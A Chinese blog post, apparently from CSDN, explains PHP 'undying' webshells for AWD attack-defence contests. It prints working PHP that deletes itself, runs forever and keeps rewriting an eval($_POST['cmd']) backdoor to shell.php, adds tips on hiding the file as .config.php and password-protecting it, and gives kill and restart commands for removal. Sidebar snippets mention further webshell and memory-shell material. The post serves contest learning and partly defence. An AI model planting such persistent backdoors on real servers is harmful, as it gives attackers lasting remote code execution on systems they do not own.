不死马

最新推荐文章于 2023-12-18 16:26:02 发布
最新推荐文章于 2023-12-18 16:26:02 发布
阅读量125 收藏 2
点赞数
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/strider1123/article/details/132074948
版权

不死马感觉挺有用的,先了解了解,早晚会用到

先来了解下不死马“不死”的原理

不死马与普通一句话的区别在于,不死马本身并不是用来连接的,而是创建一个不断生成另一个一句话的进程,我们需要连接的是另一个被创建出来的一句话木马文件

来看一个普通的不死马

<?php
set_time_limit(0);                          //用来让这个php文件能永久执行,否则会有超时时间
ignore_user_abort(1);                       //让客户端只连接一次就能一直运行,否则客户端关闭页面就会停止
unlink(__FILE__);                           //把自身文件删除
while (1) {
$content = '<?php @eval($_POST["cmd"]); ?>';//设置一句话
file_put_contents("shell.php", $content);   //将一句话写入到文件中
usleep(10000);                              //间隔时间
}
?>

这里的usleep的单位很离谱

现在上虚拟机里试试

 写好后这边访问一下,可以看到1.php不见了,shell.php被创建了,而且删不掉

 那该怎么删呢

最方便的应该是这样吧:

 直接写个脚本删除同时创建相同名称文件夹(整完想起来直接用&&执行命令不是更快)

网页这边能够看到效果:

 但是这个进程依旧是存在的,在1.php这里能够看到它依然在不断尝试写马

网上用的命令是这样的:ps aux|grep www-data|awk '{print 2}'| xargs kill -9

杀死所有www的进程,但是不知道为什么用了之后还是不好使,最后重启了下apache好了:apache2 restart

也不知道php执行脚本执行到哪去了,在ps里没看到,可能是在这几个www 的里面

 就是不知道为什么杀进程不好使,待会再研究

到这里大概了解了普通的不死马原理以及一般的防护手段,下面就应该对它进行一些改造

首先就是把要写的一句话的文件名伪装起来,比如常用的有伪装成.config.php的

不加-a看不到,而且名字也能有些迷惑性,或者其他一些看起来比较有迷惑性的名称

然后是防止其他队搭顺风车的手段

比如这里在连接的时候需要加个?passwd=shell

这里顺带说一嘴md5,它是无法被还原出明文的,因为它是一种摘要算法

它会将任何长度的字符串通过计算后转化成固定长度的字符串,不管你的小电影有几百个T都一样(乐)

而验证的方式就是再计算一边,如果两个结果对上了那就通过了

不过即使是这种方式如果密码设置的太简单也经常会遭重

 看这第一位很大可能是对的

具体的可以看看这篇文章:https://blog.csdn.net/qq_35387940/article/details/129749096

然后应该就剩下一句话本身的变形了,这个跟不死马关系不大,就不在这写了

strider1123
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AWD WAF watch bird 文件监控 不死马下载
10-06
1.该waf 1000多行,可防御一句话木马 注入 反序列化 命令执行,非65行只过滤的waf可比。 2.编译waf.c生成.so文件 waf.so (已编译) 3.将waf.so,watchbird.php文件存放在/var/www/html或其他目录中(/tmp) ...
php不死马如何kill,awd攻防之kill 不死马
weixin_33278577的博客
03-22 1656
1.pwn题目题目预设条件:官方给了一个ctf用户给我们,并且用一个root权限的守护进程去监听一个给定的端口,并且会不断以test用户启动名为game的服务(题目)。ctf用户可以直接使用 su test 切换到test用户。这样一个环境可以用这样一条命令去完成:sudo socat tcp4-listen:2019,fork exec:"sudo -u test ./game"#注:后面的ga...
PHP内存马介绍
派大星的博客
02-28 2212
PHP内存马介绍
关于PHP不死马的分析和总结
weixin_52501704的博客
10-16 1872
关于PHP不死马的分析和总结
不死马的利用与克制(基于条件竞争)及变种不死马
Welcome To Myon'Blog !
10-06 2290
不死马即内存马,它会写进进程里,并且无限地在指定目录中生成木马文件这里以PHP不死马为例上面代码即为最简单的不死马,其目的是创建一个名为".test.php"的PHP文件,该文件包含一个带有密码验证的后门,允许执行任意PHP代码。关于代码的详细解释:设置PHP脚本忽略用户中止连接,即使用户在浏览器中停止加载页面,脚本仍然会继续执行。设置脚本执行时间限制为0,意味着脚本可以无限期地运行,不会被PHP的执行时间限制所中断。
如何删除不死马
黑锤的博客
11-25 5090
当自己的服务器被别人上传了不死马,如何应对呢? 第一个方法就是,重启自己的服务,这样不死马就没有了,就不会再生成了,毕竟不死马是在内存当中的。 第二种方法就是用命令将在内存中的进程删除; kill -9 -1 这个命令可以杀掉当前用户下面的所有进程,当然就可以把不死马杀掉。 可以使用 ps aux 命令 列出所有进程,找到要杀掉的进程运用命令: kill pid 就可以了 可以使用...
内存马介绍及分析-带查杀工具tomcat memshell scanner.jsp
最新发布
weixin_65629944的博客
12-18 806
先判断是通过什么方法注入的内存马,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
2012创建不死asp大马
10-04
2012创建不死asp大马
UnLivingHorsies:使不死马自然生成在 bukkit 服务器上
06-09
使不死马自然生成在 bukkit 服务器上。 有关更多信息,请访问 要编译,请确保您至少运行 java 1.7 和 Apache Maven。 下载此存储库的内容,然后从命令行导航到存储此存储库内容的位置并运行 mvn 清洁包 从命令行。 ...
awd网络攻防赛常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
webshell不死僵尸大马
10-06
webshell不死僵尸大马(去后门本人专用)
Windows权限维持之php不死马、映像劫持、策略组脚本
Longwaer
01-09 1244
通过学习掌握Windows权限维持手段,提升在个人知识小技巧,更快的知晓权限维持的作用性。
linux基础知识
Chen_Sir____的博客
11-11 173
命令解析器: shell – unix操作系统 bash – Linux操作系统 本质:根据命令的名字,调用对应的可执行程序 Linux快捷键 date:时间 history:历史(ctrl+p=在历史记录中一条一条向上切换 ctrl+n=在历史记录中一条一条向下切换) 光标移动:往回=ctrl+b 往后=ctrl+f 行首=ctrl+a 行尾=ctrl+e 行中字符删除操作:光标前=ctrl+h 光标后=ctrl+d(光标后即光标覆盖的字符) 行中光标前所有字符操作:光标前=ctrl+u 自动填充命令:
不死马原理
看不尽的尘埃——博客
11-19 4376
前言 首先普及一下木马、病毒和后门的概念。 木马 除具有以上功能外还具有主动攻击性,就是说感染木马后,木马传输者可以远程控制你的计算机,在你不知道的情况下查看你的隐私文件,资料等......... 后门 后门,本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目...
Php-不死马的权限维持
mingyqf的博客
02-18 661
转发自知乎: https://zhuanlan.zhihu.com/p/420615927 侵删 大家在渗透测试中,碰到java的程序,都会打上一个内存马 但是在php的程序中很少有这种webshell/维持方式,/无主文件落地的方式 接下来就让小编带你聊聊,php中不死马的权限维持,其实早在之前比较火 0x01 PHp - 不死马(内存马) 在实战当中,现在很少有人用不死马了,其实可以有效的去用来做一些防护的绕过。也加大了一些溯源的难度,和宿主检测webshell的难度 第一种, 是把木马通过写入的方
渗透测试-不死马的创建和查杀
lza20001103的博客
09-01 2199
不死马的创建和查杀 文章目录不死马的创建和查杀0x00 创建0x01 查看0x02 查杀root用户角度的查杀:重启web服务。其他用户的查杀: 0x00 创建 md5加密密码: 代码: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e4
不死马php如何取证_不死马 - Unixcs - 博客园
weixin_39805720的博客
12-21 305
什么是不死马?内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。生成过程不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)两种不死马网上流传的不死马ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '...
不死马php如何取证_awd的防御脚本以及查杀不死马测试
weixin_39682944的博客
01-12 1050
防御脚本github上的awd通防脚本三个。一个记录敏感请求,一个记录所有的东西。一个是waf,针对sql注入的。wafjk.phpwafjk.php是用来记录敏感操作的,可以自行修改pattern,增加更多的敏感函数,只要匹配到,就会记录下来敏感操作。首先我在index.php包含了include "wafjk.php";...
不死马php如何取证_AWD不死马与克制方法
weixin_39796878的博客
12-21 390
一个简单的不死马如:ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.3.php';$code = '';//pass=passwhile (1){file_put_contents($file,$code);system('touch -m -d "2018-12-01 09:10:12" .3.php');...
python不死兔子
11-16
根据引用和引用,可以使用Python实现不死兔子问题,即在第n个月时,兔子的总数为多少。具体实现方法如下: ```python month = int(input("请输入月份:")) rabbits = [1, 1] for i in range(2, month): rabbits.append(rabbits[i-1] + rabbits[i-2]) total_rabbits = rabbits[-1] * 2 print("{}个月后,兔子的总数为{}".format(month, total_rabbits)) ``` 在这个程序中,我们首先要求用户输入月份,然后使用一个列表来存储每个月的兔子数量。由于第一个月和第二个月的兔子数量都是1,因此我们将它们添加到列表中。然后,我们使用一个循环来计算每个月的兔子数量,直到达到用户输入的月份为止。在每个月,我们将前两个月的兔子数量相加,并将结果添加到列表中。最后,我们将最后一个月的兔子数量乘以2,得到总兔子数量,并将其打印出来。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值